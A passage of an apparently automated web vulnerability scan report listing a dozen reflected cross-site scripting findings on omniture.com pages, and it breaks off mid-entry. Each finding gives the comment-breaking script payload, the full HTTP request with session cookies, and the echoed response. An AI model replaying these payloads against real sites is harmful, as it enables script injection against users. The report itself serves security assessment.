HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:50:32 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:50:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:50:32 GMT
Content-Length: 27669
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:50:32 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>3004f97382 cached on 2 February 2011 at 21:50:32 PST (dea3263f04eb981b5d960442cc14ab3b) -->
...[SNIP]...

4.457. http://www.omniture.com/en/company/press_room/news [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/news

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 30025--><script>alert(1)</script>a62a3da0947 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_room30025--><script>alert(1)</script>a62a3da0947/news HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:47:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:47:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:47:36 GMT
Content-Length: 27667
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:47:36 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>a62a3da0947/news cached on 2 February 2011 at 21:47:36 PST (6246c5f2681409bd7166fd490b113094) -->
...[SNIP]...

4.458. http://www.omniture.com/en/company/press_room/news [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/news

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 196a7--><script>alert(1)</script>e3c5b5bca9f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_room/news196a7--><script>alert(1)</script>e3c5b5bca9f HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:48:39 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:48:39 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:48:39 GMT
Content-Length: 27667
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:48:39 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>e3c5b5bca9f cached on 2 February 2011 at 21:48:39 PST (462499baececa20b81a6d5f0fe14c861) -->
...[SNIP]...

4.459. http://www.omniture.com/en/company/press_room/press_releases [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/press_releases

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a970f--><script>alert(1)</script>791a5c27c52 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_rooma970f--><script>alert(1)</script>791a5c27c52/press_releases HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:49:41 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:49:41 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:49:41 GMT
Content-Length: 27687
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:49:41 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>791a5c27c52/press_releases cached on 2 February 2011 at 21:49:41 PST (45b4ae58b5e221e55bdd3bc1db192ec0) -->
...[SNIP]...

4.460. http://www.omniture.com/en/company/press_room/press_releases [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/company/press_room/press_releases

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 61f3b--><script>alert(1)</script>06bfdf5f2ee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/company/press_room/press_releases61f3b--><script>alert(1)</script>06bfdf5f2ee HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/5; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=seo_other_referer; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092434|check#true#1296673300|session#1296673129491-732177#1296675094; s_cc=true; use207=7; s_sv_s1=1@29@a//1296661247027/594025749283; search_stack=%5B%5B%22seo_other_referer%22%2C%221296673232401%22%5D%5D; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%2C%5B%22seo_other_referer%22%2C%221296673199867%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=8efaa0a698bb71e2eade7cb7d05cb14e;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Fri, 04 Feb 2011 05:51:13 GMT
Cache-Control: public, max-age=14400
Last-Modified: Thu, 03 Feb 2011 05:51:13 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 05:51:13 GMT
Content-Length: 27687
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:51:13 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Corporate Overview | Online Bus
...[SNIP]...
<script>alert(1)</script>06bfdf5f2ee cached on 2 February 2011 at 21:51:13 PST (3e182dda72d919bb487cf22fb4356688) -->
...[SNIP]...

4.461. http://www.omniture.com/en/education/academic_initiative [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/academic_initiative

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 63cfe--><script>alert(1)</script>ec68a8888 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/academic_initiative63cfe--><script>alert(1)</script>ec68a8888 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:14:25 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:14:25 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:14:25 GMT
Content-Length: 23141
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:14:25 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>ec68a8888 cached on 2 February 2011 at 11:14:25 PST (49a0cf06aef02c1953ee1e59392916d4) -->
...[SNIP]...

4.462. http://www.omniture.com/en/education/certification [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload aac9c--><script>alert(1)</script>0cfe1c6bce6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certificationaac9c--><script>alert(1)</script>0cfe1c6bce6 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:11:12 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:11:12 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:11:13 GMT
Content-Length: 23133
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:11:12 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>0cfe1c6bce6 cached on 2 February 2011 at 11:11:12 PST (7236a2b72f422758dabbef5d691b2b1d) -->
...[SNIP]...

4.463. http://www.omniture.com/en/education/certification/implementation [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/implementation

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 3847f--><script>alert(1)</script>625d24fd451 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification3847f--><script>alert(1)</script>625d24fd451/implementation HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:01 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:01 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:01 GMT
Content-Length: 23163
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:01 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>625d24fd451/implementation cached on 2 February 2011 at 11:12:01 PST (932413f6b44f522e113143663d0857d0) -->
...[SNIP]...

4.464. http://www.omniture.com/en/education/certification/implementation [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/implementation

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 2b46f--><script>alert(1)</script>6354ab9e8f8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/implementation2b46f--><script>alert(1)</script>6354ab9e8f8 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:42 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:42 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:42 GMT
Content-Length: 23163
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:42 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>6354ab9e8f8 cached on 2 February 2011 at 11:12:42 PST (db524171591dddceb95d342e172394a6) -->
...[SNIP]...

4.465. http://www.omniture.com/en/education/certification/insight_analyst [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_analyst

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 33d01--><script>alert(1)</script>27e3a465332 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification33d01--><script>alert(1)</script>27e3a465332/insight_analyst HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:21 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:21 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:21 GMT
Content-Length: 23165
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:21 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>27e3a465332/insight_analyst cached on 2 February 2011 at 11:12:21 PST (b0c675645e03e78436fabd49fced187a) -->
...[SNIP]...

4.466. http://www.omniture.com/en/education/certification/insight_analyst [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_analyst

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 5ec63--><script>alert(1)</script>2ee03132af2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/insight_analyst5ec63--><script>alert(1)</script>2ee03132af2 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:57 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:57 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:57 GMT
Content-Length: 23165
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:57 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>2ee03132af2 cached on 2 February 2011 at 11:12:57 PST (fa42878b469d849f609e2e83fd8ad885) -->
...[SNIP]...

4.467. http://www.omniture.com/en/education/certification/insight_architect [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_architect

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 5c06f--><script>alert(1)</script>746d93a84eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification5c06f--><script>alert(1)</script>746d93a84eb/insight_architect HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sv_p1=1@15@s/5084/5072&e/3; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cid=natural_bookmark; BIGipServerhttp_omniture=84542986.5892.0000; mbox=PC#1296661217505-786518.17#1299092330|check#true#1296673197|session#1296673129491-732177#1296674990; s_cc=true; use207=7; s_sv_s1=1@28@a//1296661247027/13731382181; campaign_stack=%5B%5B%22natural_bookmark%22%2C%221296661227060%22%5D%5D; cms_site_lang=1; _jsuid=9633613657349828981; omniture_unique=c4b47f0affb47cea2cd263f6285f016c;

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Thu, 03 Feb 2011 19:12:34 GMT
Cache-Control: public, max-age=14400
Last-Modified: Wed, 02 Feb 2011 19:12:34 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:12:34 GMT
Content-Length: 23169
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:12:34 GMT; path=/; domain=omniture.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
<title>Adobe Training Services ... Lea
...[SNIP]...
<script>alert(1)</script>746d93a84eb/insight_architect cached on 2 February 2011 at 11:12:34 PST (a515a25e6d7b1a36a1eb5a0d92a87de8) -->
...[SNIP]...

4.468. http://www.omniture.com/en/education/certification/insight_architect [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/en/education/certification/insight_architect

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 7e26d--><script>alert(1)</script>246fdc9e602 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/education/certification/insight_architect7e26d--><script>alert(1)</script>246fdc9e602 HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
